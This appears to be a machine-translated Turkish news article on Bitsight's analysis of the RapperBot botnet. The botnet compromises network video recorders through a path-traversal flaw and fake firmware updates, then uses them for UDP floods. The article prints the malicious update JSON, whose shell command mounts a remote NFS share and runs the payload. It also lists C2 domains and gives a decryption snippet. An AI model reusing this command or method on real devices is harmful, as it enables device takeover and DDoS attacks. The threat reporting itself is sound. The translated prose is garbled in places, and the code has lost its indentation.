Siber güvenlik araştırmacıları, Nisan 2025 başlarında UDP Sel trafiğinde tehlikeye atılan ağ video kaydedicilerinden (NVR’ler) ve diğer kenar cihazlarından kaynaklanan endişe verici bir artış tespit etmeye başladı.
Milisaniye enfeksiyonun milisaniyesinde, bu cihazlar, şüphesiz hedeflerde ezici paketleri yönlendirmek için silahlandırıldı, bu da hizmet kesintilerine ve büyük bant genişliği tüketimine yol açtı.
Bitsight analistleri bu etkinliği, adlandırdıkları yeni bir botnetin çalışması olarak tanımladı Rapçibotalışılmadık derecede hızlı öldürme zincirine ve tespitten kaçınmak için eski donanım kısıtlamalarının yenilikçi kullanımına dikkat çekiyor.
.webp)
Kötü amaçlı yazılımların ortaya çıkışı tanıdık bir patern izler: Tehdit aktörleri, maruz kalan web arayüzleri için interneti tarar, kaba veya varsayılan kimlik bilgilerini kullanır ve bir ürün yazılımı güncellemesi olarak gizlenmiş kötü amaçlı bir yük yükü sunar.
Yürütüldükten sonra, rapperbot derhal iki ayrı eylem başlatır: şifreli DNS TXT kayıt sorguları komut ve kontrol (C2) IP adresleri ve 80 numaralı bağlantı noktasında sürekli UDP selleri.
Etki değerlendirmeleri, bireysel cihaz veriminin 1 Gbps’yi aştığını ve bulut tabanlı arama sağlayıcıları ve sosyal medya platformları da dahil olmak üzere büyük hedeflere karşı koordineli kampanyalar sırasında 7 TBPS’nin üzerinde toplu botnet kapasitesinin önüne geçtiğini göstermektedir.
Potuna rağmen, kötü amaçlı yazılımların davranışı zarif bir şekilde basittir: mimariye özgü ikili dosyaları almak ve yürütmek için uzak bir NFS payı, daha sonra tamamen bellekte çalıştırmak için kendi aşamalı aşamalı.
Bitsight araştırmacıları, bu stratejinin, standart indirme araçlarının gibi birçok IoT cihazında minimum meşgul kutusu ortamından yararlandığını belirtti. curl veya /dev/tcp yok.
NVR’nin ürün yazılımı güncelleme mekanizmasını kullanarak-özellikle, web sunucusunda bir yol geçiş sıfır gününü ve ardından NFS üzerinden bir ikili getiri izleyerek, rapperbot, antivirüs uyarılarını tetikleyen olağan dosya sistemi artefaktlarından kaçınır.
.webp)
Ürün Yazılımı Güncellemesi JSON BAĞLI (Kaynak – Bitsight)
Kaputun altında, rapperbot’un C2 keşif mekanizması, açıkçası alanlarında barındırılan şifreli txt kayıtlarına dayanmaktadır. iranistrash.libre Ve pool.rentcheapcars.sbs.
Kötü amaçlı yazılım, sert kodlanmış alt alan, etki alanı ve TLD listelerinden rastgele seçerek önceden belirlenmiş 32 ana bilgisayar adından birini oluşturur, ardından bu adları özel DNS sunucularına (1.1.1.1, 8.8.8.8 ve diğerleri) çözer.
TXT yanıtı, botun özel RC4 benzeri algoritma ile şifresini çözdüğü ve ardından baz-56 kod çözme ile boru tarafından ayrılmış bir şifreli IP adresleri listesi içerir.
Şifreleme aşamalarını gösteren bir python snippet’i aşağıda görünür:-
# Stage 1: Key Scheduling Algorithm (KSA-like)
S = list(range(56))
key = (first_byte_index + second_byte_index * 56)
for i in range(55, 0, -1):
key = (0x41C64E6D * key + 0x3039) & 0xFFFFFFFF
j = key % (i + 1)
S[i], S[j] = S[j], S[i]
# Stage 2: Keystream-based XOR decryption
keystream = bytearray()
i = j = 0
for b in encrypted_payload[2:]:
i = (i + 1) % 56
j = (j + S[i]) % 56
S[i], S[j] = S[j], S[i]
keystream. Append(S[(S[i] + S[j]) % 56] ^ b)
# Stage 3: Base-56 decoding to obtain plaintext IP list
plaintext = base56_decode(keystream)
print(plaintext) # e.g., b"194.226.121.51|188.92.28.62|...".webp)
Enfeksiyon mekanizması
Rapperbot’un enfeksiyon vektörü, savunmasız NVR’lerin idari limanından (TCP 34567) yararlanır.
Maruz kalan bir cihazı tanımladıktan sonra, saldırgan hesap yapılandırma dosyalarını indirmek için bir yol geçişli kusurundan yararlanır ve hem karma hem de düz metin kimlik bilgilerini ortaya çıkarır.
Bu kimlik bilgileriyle, saldırgan sahte bir ürün yazılımı güncellemesi başlatır ve tescilli güncelleme protokolü üzerinden fermuarlı bir yük gönderir.
Zip arşivi basit bir InstallDesc JSON Cihazın monte edilmesini öğretiyor 104.194.9.127:/nfs ve yük komut dosyasını yürütün:-
{
"UpgradeCommand": [
{
"Command": "Shell",
"Script": "cd /var;mount -o intr,nolock,exec 104.194.9.127:/nfs z;z/z;"
}
]
}Bu yaklaşım, NVR’nin meşgul kutusu sınırlamalarını akıllıca atlıyor – hayır wget– curlveya / dev/tcp– NFS kullanarak, minimal gömülü Linux sistemlerinde bile evrensel olarak desteklenen bir protokol.
Komut dosyası, başarılı olana kadar birden fazla kol mimarisi ikili olarak yinelenir, bir işaretleyici dosyası yazar .rsonra temizlenir, diskte yürütülebilir yapılabilir kalmaz.
Montajlı bellekten derhal yürütme, adli ayak izini önemli ölçüde azaltır ve benign cihazdan aktif DDOS katılımcısına bölünmüş ikinci geçişi sağlar.
Boost your SOC and help your team protect your business with free top-notch threat intelligence: Request TI Lookup Premium Trial.